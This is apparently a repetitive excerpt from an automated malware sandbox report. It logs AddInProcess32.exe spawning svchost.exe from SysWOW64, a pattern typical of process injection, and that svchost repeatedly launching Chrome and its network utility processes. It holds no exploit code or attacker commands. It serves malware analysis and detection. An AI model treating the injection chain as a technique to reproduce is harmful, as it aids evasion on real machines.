            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
